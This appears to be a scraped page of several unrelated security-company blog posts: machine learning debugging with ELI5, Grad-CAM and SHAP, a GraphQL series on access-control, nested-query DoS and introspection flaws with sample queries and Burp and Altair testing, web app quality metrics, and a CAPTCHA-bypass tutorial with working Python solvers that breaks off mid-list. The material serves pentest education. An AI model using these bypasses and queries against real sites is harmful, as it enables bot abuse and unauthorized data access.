Neural networks

A peek into the black-box: Debugging deep neural networks for better predictions

 

Deep learning models are often criticized for being complex and opaque. They are called black boxes because they deliver predictions and insights, but the logic behind their outputs is hard to comprehend. Because these models are built from complex, multilayer, nonlinear neural networks, data scientists find it difficult to ascertain the factors or reasons behind a given prediction.

This unintelligibility makes people wary of taking important decisions based on the models’ outputs. As human beings, we trust what we understand and can verify, and over time this has served us well. So, being able to show how models go about solving a problem to produce insights will help build trust, even among people with only a cursory knowledge of data science.

To achieve this it is imperative to develop computational methods that can interpret, audit, and debug such models. Debugging is essential to understanding how models identify patterns and generate predictions. This will also help us identify and rectify bugs and defects.

In this article we delve into the different methods used to debug machine learning models. 

 

 

Source: Interpretable Machine Learning book, https://christophm.github.io/interpretable-ml-book/terminology.html

 

Permutation Importance

Also known as permutation feature importance, this algorithm computes a model’s sensitivity to permutations (alterations) of a feature’s values. Standard feature importance evaluates each feature of your data and scores it based on its relevance to the output. Permutation feature importance, by contrast, scores each feature by measuring how the model’s output degrades after that feature’s values have been altered.

For instance, let us randomly permute or shuffle the values of a single column in the validation dataset with all the other columns intact. If the model’s accuracy drops substantially and causes an increase in error, that feature is considered “important”. On the other hand, a feature is considered ‘unimportant’ if shuffling its values doesn’t affect the model’s accuracy.
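To make the idea concrete, here is a minimal sketch (not from the original article) assuming a fitted scikit-learn classifier named model and a validation set X_val (a pandas DataFrame) with labels y_val:

import numpy as np
from sklearn.metrics import accuracy_score

def permutation_importance_score(model, X_val, y_val, feature, n_rounds=5):
    """Average drop in accuracy after shuffling a single feature column."""
    baseline = accuracy_score(y_val, model.predict(X_val))
    drops = []
    for _ in range(n_rounds):
        X_shuffled = X_val.copy()
        # Shuffle only this column; every other feature stays intact.
        X_shuffled[feature] = np.random.permutation(X_shuffled[feature].values)
        drops.append(baseline - accuracy_score(y_val, model.predict(X_shuffled)))
    return float(np.mean(drops))  # a large drop => an "important" feature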

 

Debugging ML models using ELI5

ELI5 is a Python library that supports several ML frameworks and helps to easily visualize and debug black boxes using a unified API. Among other things, it can compute permutation importance. Note that permutation importance should only be computed on held-out test data after the model is built.


 

After our model is ready, we import ELI5 to calculate permutation importance.

Importing ELI5 for debugging ML models
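A minimal sketch of what this step might look like, assuming a fitted scikit-learn regressor named my_model and validation data X_val, y_val (names are illustrative, not the article’s original code):

import eli5
from eli5.sklearn import PermutationImportance

# Compute permutation importance on held-out validation data.
perm = PermutationImportance(my_model, random_state=1).fit(X_val, y_val)

# Render the weights table (works in a notebook).
eli5.show_weights(perm, feature_names=X_val.columns.tolist())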

The output of the above code is shown below:

output

The features at the top are the most important: any alteration to their values will reduce the model’s accuracy significantly. The features at the bottom of the list are unimportant, in that permuting their values will not reduce the model’s accuracy. In this example, OverallQual was the most important feature.

 

Debugging CNN-based models using Grad-CAM (Gradient-weighted Class Activation Mapping)

Grad-CAM is a technique that produces visual explanations for the outputs of Convolutional Neural Network (CNN) based models, making them more transparent. It examines the gradient information that flows into the final convolutional layer of the network to understand the output. Grad-CAM can be used for image classification, image captioning, and visual question answering. Its output is a heatmap visualization, which is used to visually verify that the model has learned to look at the right patterns in an image.
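As a rough illustration of the idea, here is a hedged sketch using TensorFlow 2.x/Keras; it assumes a trained CNN named model and the name of its last convolutional layer, and is not the exact code behind the screenshots below:

import numpy as np
import tensorflow as tf

def grad_cam(model, image, last_conv_layer_name, class_index=None):
    """Return a [0, 1] heatmap of the regions that drive the predicted class."""
    # Model mapping the input image to the last conv activations and the output.
    grad_model = tf.keras.Model(
        model.inputs,
        [model.get_layer(last_conv_layer_name).output, model.output],
    )
    with tf.GradientTape() as tape:
        conv_output, predictions = grad_model(image[np.newaxis, ...])
        if class_index is None:
            class_index = int(tf.argmax(predictions[0]))
        class_score = predictions[:, class_index]
    # Gradients of the class score w.r.t. the conv feature maps.
    grads = tape.gradient(class_score, conv_output)
    # One weight per channel: global-average-pool the gradients.
    weights = tf.reduce_mean(grads, axis=(0, 1, 2))
    # Weighted sum of the feature maps, followed by ReLU and normalization.
    cam = tf.nn.relu(tf.reduce_sum(conv_output[0] * weights, axis=-1))
    return (cam / (tf.reduce_max(cam) + 1e-8)).numpy()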

Debugging ML models using Grad-CAM

 

Debugging ML models using Grad-CAM2

 

Debugging ML models using SHAP (SHapley Additive exPlanations)

SHAP is a game-theoretic approach that aims to explain a prediction by calculating the importance of each feature towards that prediction. The SHAP library uses Shapley values at its core and explains individual predictions. Lloyd Shapley introduced the concept of Shapley values in 1953, and it was later applied to the field of machine learning.

Shapley values are derived from Game theory, where each feature in the data is a player, and the final reward is the prediction. Depending on their contribution towards the reward, Shapley values tell us how to distribute this reward fairly among the players.

We use SHAP quite often, especially for models in which explainability is critical, and the results have been quite accurate.

SHAP can explain:

  • General feature importance of the model by using all the data
  • Why a model calculates a particular score for a specific row/ record
  • The more dominant features for a segment/ group of data

Shapley values calculate the feature importance by comparing two predictions, one with the feature included and the other without it. The positive SHAP values affect the prediction/ target variable positively whereas the negative SHAP values affect the target negatively. 

Here is an example to illustrate this. For this purpose, I am using the red wine quality dataset from Kaggle.

Debugging ML models using Shapley

 

Now, we produce a variable importance plot, which lists the most significant variables in descending order: the variables at the top contribute the most to the model.

Importing SHAP for debugging ML models
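A minimal sketch of this step, assuming a fitted tree-based model (for example, a random forest) named model and a pandas DataFrame X holding the wine features (names are illustrative):

import shap

# Shapley values for every feature of every row, using the tree explainer.
explainer = shap.TreeExplainer(model)
shap_values = explainer.shap_values(X)

# Variable importance plot: features sorted by mean absolute SHAP value,
# colored by each feature's value in the observation.
shap.summary_plot(shap_values, X)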

 

Mapping the plot

In the above figure, all the variables are plotted in descending order of importance. The color represents the feature’s value in that observation, whether high (red) or low (blue). A high “sulphates” content has a strong positive impact on the quality rating; the x-axis shows this impact as a positive SHAP value. Similarly, we can say that “chlorides” is negatively correlated with the target variable.

Now, I would like to show you how SHAP values are computed for individual cases. We compute the values for several observations and then choose a few of them at random.

Interpreting SHAP values

 

After choosing random observations, we initialize our notebook with initjs().
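A minimal sketch of this step, reusing the explainer and shap_values computed above (the row index is an arbitrary, illustrative choice):

import shap

shap.initjs()  # load the JS visualization library into the notebook

i = 10  # any randomly chosen observation
shap.force_plot(explainer.expected_value, shap_values[i, :], X.iloc[i, :])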

Explanation for some of the terms seen in the plot above: 

  1. Output value: Prediction for that observation, which in this case is 5.35
  2. Base value: Base value is the mean prediction, or mean (yhat), here it is 5.65
  3. Blue/ red: Features that push the prediction higher are shown in red, and those that push it lower are shown in blue.

For more information and to test your skills, check out Kaggle.

[Quiz] Weekly Cyber Trivia Friday #1

Cyber Trivia Friday is here!

In our first-ever cyber quiz, we want to find out if you’re up-to-date on your cybersecurity news from across the world.

If you’re behind on the news, fret not. We’ve sprinkled in some hints to help you along.

The winners will be the first 3 people to submit the quiz and get all 5 questions right.

GraphQL 101: Here’s everything you need to know about GraphQL (Part 2)

 

Read Part 1 on GraphQL here.

In last week’s blog we learnt about the basics of GraphQL and how to configure a GraphQL server. We also discussed some key differences between GraphQL and REST API. 

Here’s a brief recap:

GraphQL is an open source query language for APIs that helps load data from a server to the client in a much simpler way. Comparing multiple aspects of GraphQL and REST APIs, we saw that GraphQL operations are superior to those of REST. Although the benefits of this open source language are plentiful, it comes with security vulnerabilities that developers tend to encounter from time to time.

Picking up from there, in the second part, we will discuss:

  • GraphQL: Common misconfigurations that enable hackers
  • Testing common misconfigurations in GraphQL

 

GraphQL: Common misconfigurations that enable hackers

GraphQL is one of the most efficient and flexible alternatives to REST API. However, it is vulnerable to the same attacks that REST API is prone to. 

GraphQL depends on API developers to implement its schema for data validation, and during this process they could inadvertently introduce errors. In addition, new features and functionalities that meet client requirements are added to web applications by the hour, which further increases the chance of developers committing errors.

Here we highlight some of the common misconfigurations and issues with GraphQL that allow hackers to exploit it.

  • Improper Access Control or Authorization Checks

Weaknesses in the user authentication process can potentially grant unauthorized access to anyone. If the authentication process is defective, the web application fails to restrict access to an object or resource, and ends up delivering another user’s data without performing authorization checks. This flaw allows attackers to bypass the intended access restrictions, exposing user data to abuse, deletion, or alteration.

Let’s consider a scenario where a user with the numeric object ID 5002 wants to retrieve his/her PII, such as email ID, password, name, mobile number, etc. If this user, knowingly or unknowingly, queries a different user ID (say 5005) that belongs to another active user, and the search leaks that user’s data, the GraphQL resolver is allowing unauthorized access.

The following query consists of a user ID representing a logged in user and fetches the user’s PII:

 

query userData {
  users(id: 5002) {
    name
    email
    id
    password
    mobileNumber
    authorizationKey
    bankAccountNumber
    cvvNumber
  }
}

 

However, if the same authenticated user is able to fetch the data of ID 5005, that means there is improper access control to an object or resource. It enables hackers/ attackers to access the data of multiple users. It also allows an attacker to perform malicious activities like editing the user’s data, deleting the user from the database, etc.

 

  • Rate limit issues and nested GraphQL queries leading to DoS attacks

A single GraphQL query can trigger multiple actions that would otherwise require multiple HTTP requests. This feature increases the complexity of GraphQL APIs and makes it difficult for API developers to limit the number of requests. If requests are not properly handled by the resolver at the GraphQL API layer, it opens a door for threat actors to attack the API and perform denial-of-service (DoS) attacks.

To avoid this, only a specific number of requests per minute should be allowed to the API; if the number of requests exceeds the limit, the API should return an error or reject the request.

Let’s look at the following example of such nested queries:

 

query nestedQuery {
  allUsers {
    posts {
      follower {
        author {
          posts {
            follower {
              author {
                posts {
                  follower {
                    author {
                      posts {
                        id
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
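As a rough illustration of the rate/depth limiting idea mentioned above, here is a hedged Python sketch that estimates a query’s nesting depth from its braces and rejects anything deeper than a configured limit; real servers usually rely on dedicated query-depth or query-cost analysis libraries instead:

MAX_DEPTH = 5

def query_depth(query: str) -> int:
    """Return the maximum '{' nesting depth of a raw GraphQL query string."""
    depth = max_depth = 0
    for ch in query:
        if ch == '{':
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == '}':
            depth -= 1
    return max_depth

def reject_if_too_deep(query: str) -> None:
    if query_depth(query) > MAX_DEPTH:
        raise ValueError("Query rejected: nesting depth exceeds the allowed limit")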

 

  • Default introspection system reveals internal information

Some API endpoints enable server-to-server communications and are not meant for the general public. And yet, GraphQL’s introspection feature makes discovering and querying them possible without much difficulty.

Assume the instance where someone sends a query against an internal endpoint only to gain access to admin credentials and thereby obtain Admin Privilege. 
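If introspection is left enabled, even a short script is enough to enumerate the schema. A hedged sketch, assuming Python’s requests library and a placeholder endpoint URL:

import requests

url = "https://target.example.com/graphql"  # placeholder endpoint

# Minimal introspection query: list every type exposed by the schema.
introspection_query = "{ __schema { types { name } } }"

response = requests.post(url, json={"query": introspection_query})
print(response.json())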

Here is an example of a single endpoint which has the potential to allow attackers to access hidden API calls from the backend. 

Hidden API calls in GraphQL

 

There are several websites, such as https://apis.guru/graphql-voyager/, that display the entire list of API calls available at the backend. This provides a better understanding of the interface and also demonstrates ways to gather sensitive information from the server.

Entire list of GraphQL API calls

We have covered a few of the misconfigurations here, but there could be many others. GraphQL is also vulnerable to the bugs that affect any other API.

 

Testing common misconfigurations in GraphQL

Here we’ll be exploring two ways to test these common misconfigurations, further exploited to gain access to sensitive data or information:

  • Burp Suite – advanced intercepting proxy tool
  • Altair GraphQL – a GraphQL client available as a desktop application for major operating systems and as a browser extension

 

Testing GraphQL misconfigurations with Burp Suite

Burp Suite is a popular pentesting framework that works as a great proxy tool to intercept and visualize requests. Assuming that readers are already aware of how to configure it, we’ll be focusing on testing alone. 

  • This is what a normal HTTP request in GraphQL looks like:
    Normal HTTP request on GraphQL
  • Modify the POST query per your requirements and send it to the server. 
  • If it is misconfigured, it will fetch sensitive/ internal data. 
  • However, if you find it difficult to visualize or modify the query, you can use a Burp plugin called “GraphQL” to achieve the same results.

Burp plugin for GraphQL

 

But the major drawback of testing it in Burp Suite is the inadequate visualization of the entire schema documentation. This could result in several common misconfigurations being overlooked, unless we locate the proper documentation of API endpoints or calls implemented at the backend. Another issue related to using Burp is that we have to modify or debug the query manually which makes the process more complex. All these issues can be resolved with the help of the following method.

 

Debugging GraphQL with Altair GraphQL 

Altair helps with debugging GraphQL queries and server implementations. It rectifies the problem of modifying the queries manually and instead helps to focus on other aspects. 

Altair GraphQL is available as a desktop application for Mac, Linux, and Windows, and as an extension for almost all browsers. It provides proper documentation of the entire schema that is available at the backend. All we need to do is configure it for the web application we are testing.

Three operations of GraphQL

 

All three operations of GraphQL can be seen in the documentation section as shown above. You can further explore these options to get other fields, API endpoints, etc.

Adding supported values

 

Altair solves one of the most challenging tasks in this process, writing queries manually: it can generate queries automatically. All we need to do is pass the supported type values.

Add Query

 

  • Click on the ADD QUERY as shown above, to automatically add a query along with its arguments and fields. 
  • Now, provide the argument values to test for any bugs or misconfigurations.

Altair GraphQL

 

Altair makes bug hunting on any web application quite easy. You can test GraphQL queries and server implementations easily, as Altair performs the complex part of the process and lets you focus on the results.

 

Conclusion

In comparison with REST APIs, GraphQL offers developers improved standards of API development. And yet, it has its own security misconfigurations that can be exploited relatively easily. GraphQL is capable of bridging the gaps left by REST APIs, and REST can help address the drawbacks of GraphQL as well. They need not be treated as two incompatible technologies; we believe they can coexist.

GraphQL 101: Here’s everything you need to know about GraphQL

 

An API, or Application Programming Interface, is a family of protocols, commands, and functions used to build and integrate application software. In essence, an API is the intermediary that enables two applications to connect. For years, REST was recognized as the standard protocol for web APIs. However, there is a visible trend that could potentially upend this inclination towards REST. The State of JavaScript 2018 report finds that only 5% of the developers surveyed in 2016 used GraphQL, whereas by 2018 that figure had risen rapidly to 20.4%. Although these numbers do not by themselves show a preference for GraphQL over REST, they clearly indicate significant growth in the number of developers who opt for GraphQL in web applications.

In a two-part series about GraphQL, we discuss the following topics:

  • Introduction to GraphQL 
  • GraphQL vs. REST
  • GraphQL’s declarative data fetching
  • GraphQL: Common misconfigurations that enable hackers
  • Testing common misconfigurations in GraphQL

In this part, we explore:

  • What is GraphQL?
  • How to identify a GraphQL instance?
  • How to configure the GraphQL server?
  • Root types of GraphQL schema
  • GraphQL vs. REST (focused on data fetching)
  • GraphQL: Smooth, declarative data fetching

 

Introduction to GraphQL

What is GraphQL?

It is an open source query language for APIs that helps load data from a server to the client in a much simpler way. Unlike REST APIs, GraphQL APIs are arranged as types and fields and not as endpoints. This ensures that applications request only the data they need and receive clear, predictable responses. A GraphQL API fetches exactly the data requested; nothing less, nothing more.

It was developed by Facebook in 2012 and was later publicly released in 2015. Today, GraphQL is rapidly adopted by clients, big and small, from all over the world. Prominent websites and mobile apps such as Facebook, Twitter, GitHub, Pinterest, Airbnb, etc. use GraphQL.

REST APIs suffer from a lack of robust documentation, making it difficult for developers to know which operations an API supports and how to use them efficiently. The GraphQL schema, on the other hand, properly defines its operations, input values, and possible outcomes. When a client sends a query request, GraphQL’s resolver function fetches the result from the source.

GraphQL resolver

GraphQL allows frontend developers to retrieve data from the backend with unparalleled ease, which explains why it is generally described as Frontend Directed API technology. Evidently, it is more efficient, powerful, and flexible, and is a better alternative to REST API. 

 

How to identify a GraphQL instance?

  • A GraphQL HTTP request is typically sent to the following endpoints:
    • /graphql
    • /graphql/console
    • /graphiql
  • The GraphQL request looks similar to JSON but it’s different, as seen in the following request:

JSON

While pentesting a web application, if you come across any of the above-mentioned attributes, then it most probably uses GraphQL.

 

How to configure the GraphQL server?

We can run the GraphQL API server on localhost with the use of Express, a web application framework for Node.js. 

  • For this, after you have installed “npm”, proceed to install the two additional dependencies using the following command:
npm install express express-graphql graphql --save
  • To make the concept clearer, this is how we fetch “hello world” data from the GraphQL server using a query.

 

var express = require('express');
var graphqlHTTP = require('express-graphql');
var { buildSchema } = require('graphql');

// Construct a schema, using GraphQL schema language
var schema = buildSchema(`
  type Query {
    hello: String
  }
`);

// The root provides a resolver function for each API endpoint
var root = {
  hello: () => {
    return 'Hello world!';
  },
};

var app = express();
app.use('/graphql', graphqlHTTP({
  schema: schema,
  rootValue: root,
  graphiql: true,
}));

app.listen(4000);
console.log('Running a GraphQL API server at http://localhost:4000/graphql');
  • Save the above code as GraphQL_Server.js.
  • Now, run this GraphQL server with: 
node GraphQL_Server.js
  • If you don’t encounter an error, it means we have successfully configured our GraphQL server and we are good to proceed.
    Configuring GraphQL
  • Navigate to the endpoint http://localhost:4000/graphql in a web browser, where you will come across the GraphQL interface. You can now enter your queries here.
    Entering a query in GraphQL
  • Once the query “hello” is issued, it fetches the following data from the server:

Hello World on GraphQL
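The same query can also be issued programmatically; a minimal sketch using Python’s requests library (express-graphql accepts a JSON body containing the query on POST requests):

import requests

response = requests.post(
    "http://localhost:4000/graphql",
    json={"query": "{ hello }"},
)
print(response.json())  # expected: {'data': {'hello': 'Hello world!'}}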

Root types of GraphQL schema

The GraphQL schema has three root types. Requests against a GraphQL endpoint must start with one of these root types when communicating with the server:

  • Query: This type allows reading or fetching data from the backend server.
    GraphQL query
  • Mutation: This type is used to create, edit, or delete data.
    GraphQL Monitoring
  • Subscriptions: This root type enables real-time communication, to automatically receive real-time updates about particular events.

GraphQL Subscription

GraphQL is said to be client-driven: clients decide the exact response they require for each query, down to the individual fields, and new fields and types can be added to a GraphQL API without breaking existing queries. Contrary to how REST APIs operate, GraphQL permits clients to retrieve only the essential data, instead of complete responses.

 

GraphQL vs. REST

Both REST and GraphQL help developers design the functioning of APIs and the process by which applications access data from them, and both send data over HTTP. However, there are quite a few differences between them which show that GraphQL is superior.

A key differentiator is the method of fetching data from the backend server. While a typical REST API sends multiple requests to load data from multiple URLs, GraphQL sends only a single request to get an accurate response, leaving unwanted data behind. This is called declarative data fetching. Here’s an example to help you understand this better.

With a REST API, multiple requests are sent to multiple endpoints to fetch specific data from the server. For instance, in order to fetch a user’s ID, his posts on a social media platform, and his followers on the same channel, we have to send separate requests to paths such as /user/<id>, /users/id/<posts>, and /users/id/<followers>, only to get multiple responses for the same user.

REST API multiple endpoints

 

However, in the case of GraphQL, a single query, that includes all three requests, at a single endpoint will be enough to retrieve accurate responses to the corresponding requests. All we need to do is send a query through the interface, which gets interpreted against the entire schema, and returns the exact data that the client requested.

 

Smooth, declarative data fetching

In the instance of REST API mentioned above, we saw that 3 requests were made at 3 different endpoints to retrieve the corresponding response from the server. But in GraphQL, this process is relatively easier. A query that includes the exact data requirements like IDs, posts, and followers at a single endpoint would do the job. 

Let’s have a look at the query that is sent to the server to fetch a user’s ID, posts, and followers:

GraphQL endpoint

The above image shows how a query that includes the data requirements is sent to the backend server, and how its response is retrieved at the client side.
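A minimal sketch of the same idea in Python, assuming a /graphql endpoint and illustrative field names (user, posts, followers; not taken from the original article):

import requests

# One query, one round trip: the client states exactly which fields it needs.
query = """
query {
  user(id: 5002) {
    id
    posts { id title }
    followers { id name }
  }
}
"""

response = requests.post("https://example.com/graphql", json={"query": query})
print(response.json())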

The dissimilarities between REST and GraphQL are quite significant and can be understood by comparing how they function.

Difference between GraphQL and REST API

 

These differences do not necessarily mean that REST is not efficient or flexible; after all, it has been the standard API style for several years now. However, GraphQL is gaining popularity because it addresses and bridges the shortcomings of REST APIs.

In next week’s blog, we will explore the common GraphQL misconfigurations that enable hackers, and how you can test them. 

web-application-testing

6 major quality metrics that will optimize your web app

 

As more businesses migrate to cloud environments, making it easier for customers to access their services/ products, we have witnessed a sharp rise in the number of online businesses employing web applications. Also known as web apps, they have assumed great significance in this digital era, allowing businesses to develop and achieve their objectives expeditiously.

Well designed web apps allow organizations to gain competitive advantage and appeal to more customers. Hence, it is essential to have measurable or quantifiable metrics to gauge the quality of a web app.

 

What is a web application?

Web apps are software programs that require a web browser for interaction. And unlike other applications, users need not install the software to run web applications; all they require is a web browser. Web applications include everything from small-scale online games to video streaming applications like Netflix.

 

 What are Software Quality Metrics?

Software quality metrics gauge the quality of the software, its development and maintenance, and the execution of the project itself. In essence, software quality metrics record not only the number of defects or security flaws in the software, but also the entire process of development of the project, as well as the product.  

 

Classification of Quality Metrics

Based on the components and features, software quality metrics can be classified into:

  • Product quality metrics
  • In-process quality metrics
  • Project quality metrics

A user grades the quality of an application based on their experience with its features/functionalities, the value it provides, and after-sales services such as maintenance, upgrades, etc. However, the quality of the software is also measured based on the project, the teams involved, project cost, etc.  

 

Six major quality metrics to consider for better web applications

 

  1. Usability of the web application:

Usability testing assesses the ease with which end users can use the application. It ensures effective interaction between the user and the app. Web applications that have a complicated design or interface are least preferred by users.

In order to test the usability of a web app, its navigation, content, and other user-facing features should be tested.

For example:

  • Images and other non-text content should be placed appropriately, so as to avoid distractions.
  • The options “Search” and “Contact us” should be easy to find. 

 

  2. Performance of the web application:

Performance testing determines the behaviour of the application under different settings and configurations. For example: Performance during high usage vs normal usage. Performance of a web app contributes to its adoption, continued usage, and overall success.  

Types of performance testing

  • Load testing
  • Web stress testing

In load testing, we evaluate the performance of the web app when multiple users access it concurrently. This helps to ascertain if the app can sustain peak hours, handle large user requests or simultaneous database access requests, etc.

In web stress testing, the system is tested beyond the limits of standard conditions. The objective is to assess the behaviour of the app under volatile conditions, such as when web pages time out or responses are delayed, and to see how it recovers from crashes.

 

  3. Compatibility on different platforms and browsers:

The quality of the software also depends on whether the application is compatible with different browsers, hardware, operating systems, applications, network environments, and devices.

For instance,

  • If developers intend to have a mobile version of a web application, they ought to address and resolve any issues that may arise in that scenario.
  • While performing various actions such as printing or downloading, from a web application, the elements on the page, including text, images, etc., should be fixed in place, and properly aligned to fit on the page. 

 

  4. Requirements Traceability:

This parameter traces and maps user requirements throughout their life cycle (from their source, through the stages of development and deployment), using test cases. It checks whether every user requirement is met, and defines the purpose of each requirement and the factors it depends on.

 

Modes of requirement traceability

Based on the direction of tracing, requirement traceability can be classified into:

  • Forward traceability: Tracing the requirement sources to the resulting requirement, to ensure coherence.
  • Backward traceability: Tracing the various components of design or implementation back to their source, to verify that requirements are kept updated.
  • Bidirectional traceability: Tracing both backward and forward.

 

  5. Reliability:

A web application is not reliable if it does not produce consistent results. In an ideal situation, the application must operate failure-free, for a specified period of time, in a particular environment.

For example, a medical thermometer is only reliable if it measures the accurate temperature every time it is used.

 

  6. Security testing for the web application:

The security implementation of a web application is another factor that determines its success. As one study shows, hackers can attack users in 9 out of 10 web applications. These attacks include redirecting users to a malicious site, stealing credentials, and spreading malware. Ignoring this factor could cause serious damage to users and their businesses.

For example,

  • To test the security of web applications, we test which URLs a user can and cannot access. If an online document has an ID/ identifier such as ID=”456″ or identifier=”zm9vdC0xNl8yMDE5…” at the end of its URL, only that user should be able to access the document. If the user tries to change the ID/ identifier in the URL, they should receive an appropriate error message (a short sketch of such a check follows this list).
  • Automatic traffic can be prevented by using CAPTCHA.
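A hedged sketch of such an access-control check, with a placeholder URL, document IDs, and session cookie (a real test would use the application’s actual authentication flow):

import requests

session = requests.Session()
session.cookies.set("sessionid", "<valid session of the test user>")

own_doc = session.get("https://example.com/documents?ID=456")    # belongs to the user
other_doc = session.get("https://example.com/documents?ID=457")  # belongs to someone else

assert own_doc.status_code == 200
# A well-configured application should refuse the second request.
assert other_doc.status_code in (401, 403, 404), "Possible broken access control"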

Types of security testing

  • Dynamic Application Security Testing (DAST): It detects indicators of security vulnerabilities in applications that are running.
  • Static Application Security Testing (SAST): It analyzes the application source code, and/ or compiled versions of code that are indicative of security vulnerabilities.
  • Application Penetration Testing: It assesses how applications defend against possible attacks.

 

Additional components to be considered

To ensure that the web application is fully functional in all aspects, the following components should be inspected:

Links

  • Internal links
  • Outgoing links
  • Links that direct users to another section on the same page
  • Orphan pages in web applications
  • Broken links

Forms or other input fields

  • Verify all validations
  • Check default values
  • Wrong input
  • Links to update forms, edit forms, delete forms, etc. (if any)

Database 

  • Review data integrity while editing, deleting, and updating forms
  • Check if data is being retrieved and updated correctly

Cookies 

  • Check whether the cookies are encrypted or not
  • Evaluate application behavior after deleting cookies

How to bypass CAPTCHAs easily using Python and other methods

 

Internet service providers generally face the risk of authentication-related attacks, spam, denial-of-service attacks, and data-mining bots. The Completely Automated Public Turing test to tell Computers and Humans Apart, popularly known as CAPTCHA, is a challenge-response test created to selectively restrict access to computer systems. As a type of Human Interaction Proof, or human authentication mechanism, CAPTCHA generates challenges to identify users. In essence, a CAPTCHA test can tell machines/ computers and humans apart. This has driven a heightened adoption of CAPTCHAs across various online businesses and services.

The concept of CAPTCHA depends on human sensory and cognitive skills. These skills enable humans to read a distorted text image or choose specific images from several different images. Generally, computers and computer programs such as bots are not capable of interpreting a CAPTCHA, because CAPTCHAs present distorted images of text or numbers that most Optical Character Recognition (OCR) technologies fail to make sense of. However, with the help of Artificial Intelligence, algorithms are getting smarter and bots are now capable of cracking these tests. For instance, there are bots capable of solving a text CAPTCHA through letter segmentation mechanisms. That said, there aren’t a lot of automated CAPTCHA-solving algorithms available.

This article outlines the various methods of generating and verifying CAPTCHAs, their application, and multiple ways to bypass CAPTCHAs.

 

Reasons for using CAPTCHA

Web developers deploy CAPTCHAs on websites to ensure that they are protected against bots. CAPTCHAs are generally used to prevent:

  • Bots from registering for services such as free email.
  • Scraper bots from gathering your credentials or personal information, upon logging in or while making online payments.
  • Bots from submitting online responses.
  • Brute-force bot attacks.
  • Search engine bots from indexing pages with personal/ sensitive information.

 

General flow of CAPTCHA generation and verification

The image below represents the common method of generating and verifying CAPTCHAs:

Form Submission

Application of different types of CAPTCHA and how to bypass them

 

I. reCAPTCHA and the protection of websites

recaptcha

Google reCAPTCHA is a free service offered to prevent spam and abuse of websites. It uses advanced risk analysis techniques and allows only valid users to proceed. 

Process flow diagram of Google reCAPTCHA

 

How to bypass reCAPTCHA?

Verification using browser extensions

Browser extensions such as Buster help solve CAPTCHA verification challenges. Buster, for instance, uses speech recognition software to bypass reCAPTCHA audio challenges. reCAPTCHA allows users to download audio files. Once it is downloaded, Google’s own Speech Recognition API can be used to solve the audio challenge.

CAPTCHA solving services

Online CAPTCHA solving services offer human based services. Such services involve actual human beings hired to solve CAPTCHAs. 

 

II. Real person CAPTCHA and automated form submissions

The jQuery real person CAPTCHA plugin prevents automated form submissions by bots. These plugins offer text-based CAPTCHAs in a dotted font. This solves the problem of fake form submissions. 

 

text in dotted font

 

How to bypass real person CAPTCHA?

The following steps can be used to solve real person CAPTCHAs:

A. Create data set

In this one-time process:

  1. Collect texts from real person HTML tags
  2. Group the texts based on the words
  3. Create data set model for A-Z words (training data)
B. Testing to predict the solutions

After successfully completing process A, set up a process to:

  1. Collect texts from real person HTML tags
  2. Group the texts based on the words
  3. Fetch the word from the data set model created in process A.

 

Example: 



from selenium import webdriver
import time


dataset = {'     *       *      *      *      *      ******* ': 'J',
           '*******      *      *      *      *      *      *': 'L',
           '********  *  **  *  **  *  **  *  **  *  * ** ** ': 'B',
           '*       *       *       ****  *     *     *      ': 'Y',
           '*      *      *      ********      *      *      ': 'T',
           ' ***** *     **     **     **     **     * *   * ': 'C',
           '********  *  **  *  **  *  **     **     **     *': 'E',
           '********     **     **     **     **     * ***** ': 'D',
           '*     **     **     *********     **     **     *': 'I',
           ' ***** *     **     **     **     **     * ***** ': 'O',
           '******* *       *       *     *     *     *******': 'M',
           '******* *       *       *       *       * *******': 'N',
           '********  *   *  *   *  *   *      *      *      ': 'F',
           ' **  * *  *  **  *  **  *  **  *  **  *  * *  ** ': 'S',
           ' ***** *     **     **     **   * **    *  **** *': 'Q',
           '*******   *     * *    * *   *   *  *   * *     *': 'K',
           '     **   **   ** *  *   *   ** *     **       **': 'A',
           '******       *      *      *      *      ******* ': 'U',
           '*******   *      *      *      *      *   *******': 'H',
           '**       **       **       *    **   **   **     ': 'V',
           '*     **    ***   * **  *  ** *   ***    **     *': 'Z',
           '********  *   *  *   *  *   *  *   *  *    **    ': 'P',
           '*     * *   *   * *     *     * *   *   * *     *': 'X',
           ' ***** *     **     **     **   * **   * * *  ** ': 'G',
           '********  *   *  *   *  *   *  **  *  * *  **   *': 'R',
           '*******     *     *     *       *       * *******': 'W'}


def group_captcha_string(word_pos):
    captcha_string = ''
    for i in range(len(word_pos[0])):
        temp_list = []
        temp_string = ''

        for j in range(len(word_pos)):
            val = word_pos[j][i]
            temp_string += val

            if val.strip():
                temp_list.append(val)

        if temp_list:
            captcha_string += temp_string
        else:
            captcha_string += 'sp'

    return captcha_string.split("spsp")


# create client
client = webdriver.Chrome()
client.get("http://keith-wood.name/realPerson.html")
time.sleep(3)

# indexing text
_get = lambda _in: {index: val for index, val in enumerate(_in)}

# get text from html tag
captcha = client.find_element_by_css_selector('form [class="realperson-text"]').text.split('\n')

word_pos = list(map(_get, captcha))

# group text
text = group_captcha_string(word_pos)

# get text(test)
captcha_text = ''.join(list(map(lambda x: dataset[x] if x else '', text)))
print("captcha:", captcha_text)

III. Text-in-image CAPTCHA

Text-based/ text-in-image CAPTCHAs are the most commonly deployed kind and they use distorted text rendered in an image. There are two types of text-based CAPTCHAs:

 

Simple CAPTCHA

Simple CAPTCHAs can be bypassed using the Optical Character Recognition (OCR) technology that recognizes the text inside images, such as scanned documents and photographs. This technology converts images containing written text into machine-readable text data.

simple

Example:



import pytesseract
import sys
import argparse
try:
    import Image
except ImportError:
    from PIL import Image
from subprocess import check_output


def resolve(path):
    print("Resampling the Image")
    check_output(['convert', path, '-resample', '600', path])
    return pytesseract.image_to_string(Image.open(path))


if __name__=="__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument('path', help = 'Captcha file path')
    args = argparser.parse_args()
    path = args.path
    print('Resolving Captcha')
    captcha_text = resolve(path)
    print('Extracted Text', captcha_text)



# command to run script
python3 captcha_resolver.py cap.jpg

 

Complicated CAPTCHA

These text-in-image CAPTCHAs are too complex to be solved using the OCR technology. Instead the following measures can be considered:

  • Build machine learning models such as Convolutional Neural Network (CNN) or Recurrent Neural Network (RNN)
  • Resort to CAPTCHA solving services

 

 

IV. Sum of integers or logical operations

This unique challenge involves solving mathematical problems, particularly, finding the sum of integers.

logical captcha

To bypass this challenge, one can follow these steps (a short sketch follows the list):

  1. Extract text from HTML tags or images
